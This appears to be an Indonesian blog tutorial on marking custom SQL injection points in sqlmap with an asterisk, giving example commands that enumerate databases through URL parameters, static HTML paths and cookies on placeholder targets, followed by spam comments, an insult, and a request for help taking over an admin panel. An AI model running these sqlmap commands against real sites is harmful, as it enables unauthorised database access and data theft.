Menentukan Inject Point pada SQLmap. Kita sering melihat tutorial bagaimana menginjeksi url yang vuln. Namun rata-rata tutorial yang diberikan adalah basic sqlmap dimana inject pointnya selalu sama yakni target.com/a.php?b=1. Nah, bagaimana jika inject pointnya berbeda? Di Sqlmap kita bisa menentukan inject pointnya.
Misalnya begini:
https://target.com/article.php?page=2&id=5
Dan inject pointnya ada di parameter id. Maka perintahnya
sqlmap -u "https://target.com/article.php?page=2&id=5*" --dbs
Ya, hanya dengan menambahkan karakter * di inject point. Hal ini juga berlaku jika yang diinject adalah halaman statis html. Misalnya vuln di
https://target.com/article-315'-abcde.html
Maka di sqlmap perintahnya
sqlmap -u "https://target.com/article-315*-abcde.html" --dbs
Begitu juga dengan sqlmap post data, inject pointnya bisa ditentukan, misalnya
sqlmap -u "http://targeturl" --cookie="param1=value1*;param2=value2"
- referensi : https://miloserdov.org/?p=879
asu jalanan says
min, kalo mau belajar dari dasar banget, liat dari artikel yang mana ya?
Test Xss says
Test Xss
Test Xss says
Test Xss
Test Xss says
Test Xss
Albert says
Kalo yg diketahui cuman admin.php nya aja min?
rio says
ya injectnya di www.domain.com/admin.php*
njn says
kontol lu mmk jembdot
AN RIDHO EDI WIBOWO says
kalau saya minta dibantu ambilkan admin web saya yang dibuatkan pihak ketiga bisa nggak sobat,saya nggak bisa kendalikan semua jadi ribet kawan.
vshs says
testes
testes says
teetesss